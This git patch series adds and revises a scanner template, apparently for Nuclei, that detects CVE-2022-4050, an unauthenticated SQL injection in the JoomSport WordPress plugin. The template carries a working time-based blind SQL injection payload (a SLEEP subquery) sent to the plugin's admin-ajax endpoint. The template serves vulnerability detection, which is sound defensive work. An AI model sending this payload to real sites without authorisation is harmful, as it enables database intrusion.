From f6c9291b83d7adb772a3fe8528ba60b3df89a21d Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 13 Dec 2022 19:52:56 +0530 Subject: [PATCH 1/3] Added template for CVE-2022-4050 --- cves/2022/CVE-2022-4050.yaml | 39 ++++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-4050.yaml diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml new file mode 100644 index 0000000000..a0ed1b9e47 --- /dev/null +++ b/cves/2022/CVE-2022-4050.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-4050 + +info: + name: JoomSport < 5.2.8 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/5c96bb40-4c2d-4e91-8339-e0ddce25912f + - https://wordpress.org/plugins/joomsport-sports-league-results-management/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-4050 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + +requests: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "jscaruselcont jsview2")' + condition: and \ No newline at end of file From a5fade36dd712daf9875ed40bdf43db95044ae32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 14 Dec 2022 10:43:47 +0530 Subject: [PATCH 2/3] Update CVE-2022-4050.yaml --- cves/2022/CVE-2022-4050.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index a0ed1b9e47..f18f0c41f9 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -32,8 +32,8 @@ requests: matchers: - type: dsl dsl: - - 'duration>=6' + - 'duration>=3' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")' - condition: and \ No newline at end of file + condition: and From b96431c2ace073c4514e820a57a9e31fa1f31088 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 16 Dec 2022 07:38:03 +0530 Subject: [PATCH 3/3] Update CVE-2022-4050.yaml --- cves/2022/CVE-2022-4050.yaml | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index f18f0c41f9..12ac0b3770 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -11,28 +11,25 @@ info: - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-4050 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,joomsport-sports-league-results-management,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth requests: - raw: - | - @timeout: 10s + @timeout: 15s POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(3))aaaa);--+-"} + mdId=1&shattr={"id":"1+AND+(SELECT+1+FROM(SELECT+SLEEP(4))aaaa);--+-"} matchers: - type: dsl dsl: - - 'duration>=3' + - 'duration>=5' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "jscaruselcont jsview2")'